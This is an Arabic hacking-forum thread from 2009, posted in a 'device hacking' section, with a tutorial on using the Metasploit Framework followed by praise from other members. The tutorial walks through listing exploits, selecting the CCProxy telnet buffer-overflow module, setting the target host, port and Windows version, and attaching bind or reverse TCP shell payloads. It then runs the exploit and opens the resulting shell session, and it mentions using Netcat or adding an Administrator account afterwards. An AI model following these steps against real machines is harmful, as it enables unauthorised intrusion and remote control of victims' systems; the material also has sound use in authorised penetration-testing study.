:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قســم إختــراق الأجهــزة (http://www.vbspiders.com/vb/f36.html)
-   -   شرح استغــلال ثغرات الميتا اسبلويت -- والاوفــر فلــو -- للمتقدمين (http://www.vbspiders.com/vb/t4047.html)

sir silveEer 01-01-2009 11:02 PM

شرح استغــلال ثغرات الميتا اسبلويت -- والاوفــر فلــو -- للمتقدمين
 
مشروع الميتا اسبلويت

اولا هذا الشرح ليس للمستوي المبتدأ

يحتوي على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات
كود:

Buffer overflow
و فحص الأنظمة و الشبكات
كما يحتوي علي قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة
قبل البداية بالشرح أحب اقول عدة اشياء
الميتا اسبلويت استخدامها سهل وبسيط بالاضافه الي انوا من اقوي الاختراق
وضعت لكم هذا الشرح من باب الغرض العلمي
رغم اعتزالي للهكر ولكن لرغبة احد الاصدقاء

نبدا علي بركة الله
اولا تنصيب الفرام وورك الخاص بالوينندوز او اللينكس
بعد تنصيب البرنامج
بيكون معه بعض الاداوت الخاصه
مثل n map
بعد اتمام عملية التنصيب بنجاح
تظهر لك شاشة مشابهه لشاشة الدوس
اتركها حتي ينتهي البرنامج بحفظ البيانات بالجهاز واكمال الادوات
http://www12.0zz0.com/2009/01/01/18/669258662.jpg

بعد اتمام كل شئ تظهر لك شاشة الترحيب
http://www12.0zz0.com/2009/01/01/18/846750031.jpg

اوك لحد هنا تمامـ

ثانيا نفتح البرنامج
اصحاب اللينكس بيكون البرنامج متواجد علي هذا المسار
/
كود:

pentest/exploits/framework3/
اما بالنسبة للويندوز بيكون زي اي برنامج عادي
من قايمة start -- all program
http://www12.0zz0.com/2009/01/01/18/363343742.jpg

انت الان تتعامل مع شاشة مثل شاشة الدوس الصغير
لها محث msf<
لاظهار معلومات عن الاوامر الخاصة بالميتا نستخدم الامر هيلب
سيكون كتابة جميع اوامر الميتا علي هذا المنوال
كود:

msf > help
بعدها انتر ثم انتظر النتيجه
http://www12.0zz0.com/2009/01/01/18/628656384.jpg

اهم اوامر الثغرات هي
اقتباس:

info exploit
use exploit
show exploits
1- الامر show exploits لعرض استغلالات الثغرة
2- الامرinfo exploit لعرض معلومات عن الثغرة والبرامج التي تشتغل عليها
3- الامر use exploit لاستخدام الثغرة والدخول لعيها

يعني في جميع الثغرات اللي راح نستخدمها لها طريقة في التنفيذ
الامر ليس بصعب
كل ما عليك هو انك هتتبع 4 خطوات راح اقولك عليهم وتكون مرتاح وشغال تمامـ
1- نستعرض ثغرات المسروع الموجودة والمتاحه لنا بالاصدار بالامر show exploits
2- نختار الثغرة اللي راح نطبق عليها ونظهر معلومات عنها بالامر info exploit
3- ندخل علي الثغرة ونطبق الاتصال معها بالامر use exploit
نبدأ بعرض الثغرات
كود:

show exploits
يبدا البرنامج بفحص الشبكة
وعرض الاوفر فلو Overflow
Samba lsa_io_trans_names Heap Overflow solaris/samba/trans2open Samba trans2open Overflow (Solaris SPARC) solaris/sunrpc/sadmind_adm_build_path Sun Solaris sadmind adm_build_path() Buffer Overflow solaris/sunrpc/sadmind_exec Solaris sadmind Command Execution solaris/sunrpc/ypupdated_exec Solaris ypupdated Command Execution solaris/telnet/fuser Sun Solaris Telnet Remote Authentication Bypass Vulnerability solaris/telnet/ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow test/aggressive Internal Aggressive Test Exploit test/exploitme MIPS Aggressive Test Exploit test/kernel Internal Kernel-mode Test Exploit unix/misc/distcc_exec DistCC Daemon Command Execution unix/misc/spamassassin_exec SpamAssassin spamd Remote Command Execution unix/smtp/clamav_milter_blackhole ClamAV Milter Blackhole-Mode Remote Code Execution unix/webapp/awstats_configdir_exec AWStats configdir Remote Command Execution


http://www12.0zz0.com/2009/01/01/18/340174375.jpg


تم اظهار ثغرات كثيرة وبجانب كل ثغرة البرنامج التي تشتغل علية الثغرة مثل النظام والاصدار التي تشتغل علية

ولاظهار معلومات اكتر سنتخدم الامر info

مثال
كود:

info windows/tftp/tftpdwin_long_filename
لتكون النتيجه

Name: TFTPDWIN v0.4.2 Long Filename Buffer Overflow Version: 5773 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Provided by: patrick <> Available targets: Id Name -- ---- 0 Universal - tftpd.exe Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 69 yes The target port Payload information: Space: 284 Avoid: 1 characters Description: This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten.


لنأخذ اقوي الثغرات ونجرب عليها
/
كود:

proxy/ccproxy_telnet_ping
ننفذ الثغرة بالميتا
كود:

info windows/proxy/ccproxy_telnet_ping
لنري الاستغلال
وهو معلومات عن الثغرة والمنافذ المفتوحه وكيف لنا ان ندخل من خلالها
كما تلاحظون
بدا بعرض الثغرات

Windows 2000 Pro All - English 1
Windows 2000 Pro All - Italian 2
Windows 2000 Pro All - French 3
Windows XP SP0/1 - English 4
Windows XP SP2 - English


Name Current Setting Required Description

Payload information:

http://www12.0zz0.com/2009/01/01/18/999408842.jpg

في هذه الثغرة يوجد لدينا خيارين أساسيين
الأول هو IP السيرفر الذي يستعمل برنامج CCProxy
الثاني فهو المنفذ الذي يستخدمه البرنامج,
لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows اي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح

الأن ننفذ الأمر use لنستخدم الثغرة
كود:

use windows/proxy/ccproxy_telnet_ping
بعد تنفيذ الامر سوف نلاحظ انتقال المحث الي الامر use
معني ذلك اننا في حالة تصنت
http://www12.0zz0.com/2009/01/01/18/890528820.jpg

الان نستخدم الامر show لعرض خيارات الثغرة المتاجه لنا
exploit(ccproxy_telnet_ping) > show options
http://www12.0zz0.com/2009/01/01/18/976831605.jpg

اظهر لنا rehost وهو اي بي الجهاز
الان نبدأ باستهداف هذا الجهاز
بالامر
كود:

set rhost 127.0.0.1
طبعا المنفذ الذي يستخدمه هذ البرنامج 23 البروكسي
ويمكن تغييرة حسب المستخدم باستخدام الامر
كود:

set RPORT 21
بعد ذلك نقوم بتحديد الانظمة المتاحه
باستخدام الامر show targets
تكون النتيجه
http://www12.0zz0.com/2009/01/01/18/131400942.jpg
>> show targets
Exploit targets: Id Name -- ---- 0

Windows 2000 Pro All - Italian 2
Windows 2000 Pro All - French 3
Windows XP SP0/1 - English 4
Windows XP SP2 - English

الان لدينا 5 انظمة

نختار احدهم
انا راح اختار النظام رقم واحد
كود:

Windows 2000 Pro All - English 1
الان ندخل علي النظام
set TARGET 1
http://www12.0zz0.com/2009/01/01/18/751159740.jpg


بعد ذلك نقوم باظهار الاستغلال المتاحه
كود:

show payloads
تكون النتيجه هكذا

Trap generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6) generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support) generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager generic/debug_trap/reverse_http Generic x86 Debug Trap, PassiveX Reverse HTTP Tunneling Stager generic/debug_trap/reverse_ipv6_tcp Generic x86 Debug Trap, Reverse TCP Stager (IPv6) generic/debug_trap/reverse_nonx_tcp Generic x86 Debug Trap, Reverse TCP Stager (No NX Support) generic/debug_trap/reverse_ord_tcp Generic x86 Debug Trap, Reverse Ordinal TCP Stager generic/debug_trap/reverse_tcp Generic x86 Debug Trap, Reverse TCP Stager generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline windows/dllinject/bind_ipv6_tcp Windows Inject DLL, Bind TCP Stager (IPv6) windows/dllinject/bind_nonx_tcp Windows Inject DLL, Bind TCP Stager (No NX Support) windows/dllinject/bind_tcp Windows Inject DLL, Bind TCP Stager windows/dllinject/reverse_http

اختار انت اي استغلال يناسبك


نجرب علي هذا الاستغلال
windows/shell_bind_tcp
طريقة التنفيذ
set PAYLOAD windows/shell_bind_tcp
http://www12.0zz0.com/2009/01/01/19/914503919.jpg
تستطيع فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator

الان نظهر الخيارات للثغرة
نستخدم الامر show options

ظهر لنا الخيارات المتاحه كاي دي الجهاز والمنفذ 4444

ولاستخدام الاتصال العكسي بدل الثغرة السابقه
نختار
كود:

windows/shell_reverse_tcp
ويكون التنفيذ
set PAYLOAD windows/shell_reverse_tcp

وبعدها اظهار show options

وهكذا علي اي ثغرة
نكمل علي الثغرة الثانيه وهي الاتصال العكسي

يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر: set LHOST 127.0.0.1
http://www8.0zz0.com/2009/01/01/19/755457674.jpg

الان نطبق الامر exploit

اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الاستغلال

لرؤية الاتصالات العكسية واظهاراها
نستخدم الامر sessions -l

لتكون النتيجه
>> sessions -l
Active sessions
1 Command shell 127.0.0.1:23443 -> 127.0.0.1:1024

اما في حالة No active sessions.
فأن هناك خطأ بالاتصال

ولنتصل باول اتصال
نقوم بتنفيذ الامر
كود:

sessions -i 1
وهكذا
ولعمل تحديث لثغرات الميتا
ننفذ الامر
كود:

svn update
اتمني ما يكون فيه غموض بالشرح

تحميل البرنامج
موقع الميتا اسبلويت

الخاص بالفرام وورك

البرنامج الخاص بالويندوز

البرنامج الخاص باللينكس

راجع الدرس مرة واتنين وتلاته راح تلقاه سهل وبسيط

PASSEWORD 01-01-2009 11:40 PM

موضوع رائع
بارك الله فيك
شكراوالله

medaille D Or 01-02-2009 08:07 AM

موضوع جميل جاري اعادة قراءة الموضوع
شكرا لك ع الطرح المفيد

AbO-Ra3d 01-02-2009 03:16 PM

موضوع حلو بس أخي وين البرامج
واللهواللهواللهوالله

sir silveEer 01-02-2009 05:05 PM

مشكــــورين المرــوور

تم رفع روابط التحميل

لعيونك ابو رعــد :)

AbO-Ra3d 01-02-2009 05:57 PM

مشكور كثير حبيبي
موضوع مميز من عضو مميز لك الاحترام
والتقدير

Sniper_Mo 01-03-2009 11:43 AM

موضوع روعة من عضو اروع ...شكرا يا غالي

MrXRoMaNcE1 01-08-2009 03:20 AM

وربي مبدع هو دا الاختراق الحقيقي في انتظار مواضيع اخرى .

ويعطيك العافية يا بطل

NEVER HaCKEr 01-09-2009 02:54 PM

شرح رائع واكثر من رائع يستحق الانجااااز في الهكر العربي اهنيك اخوي على الشرح الرائع

واصل ابداعك يامبدع
الله يوفقك انشاءالله

تقبل مرووووري اخي

IzRi-InO 01-26-2009 09:25 PM

شرح اكثر من رائع هذا هو الاختراق الحقيقي
وانا بوجد في درس مثل هذا سوف يكون بالفديو ان شاء الله
ولكن مايقدر يفهمه الكل

H@Jr!_H@Ck 01-26-2009 09:56 PM

موضوع رائع
بارك الله فيك

T3BaN_HaCkEr 01-26-2009 10:04 PM

اشكرك اخي على موضوعك الرائع
ننتظر من الأخ ازري اينو ان يضع الشرح بالفيديو ليكون أسهل ان شاء الله

H@Jr!_H@Ck 02-01-2009 03:17 AM

مشكور........................................ ...مش كور
مشكور...........مشكور.......................م شكور. ........مشكور
مشكور......................مشكور......مشكور....... ............مشكور
مشكور...........تسلمــــ.........مشكور....... ..ايد كــــــ........مشكور
مشكور............................................. ...............مشكور
مشكور....................... مشكور ...….................مشكور
مشكور............................................. ....مشكور
مشكور.......Thanks !!!!!!!!!!!!!..........مشكور
مشكور....................................مشكو ر
مشكور...........................مشكور
مشكور................مشكور
مشكور.......مشكور
مشكور

EXE 02-03-2009 04:42 AM

http://img381.imageshack.us/img381/5087/3losh11sp7.gif

delta07 09-09-2011 05:00 AM

رد: شرح استغــلال ثغرات الميتا اسبلويت -- والاوفــر فلــو -- للمتقدمين
 
مشكوووووووووووووووووووووووووووووووووووووووور


الساعة الآن 04:21 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0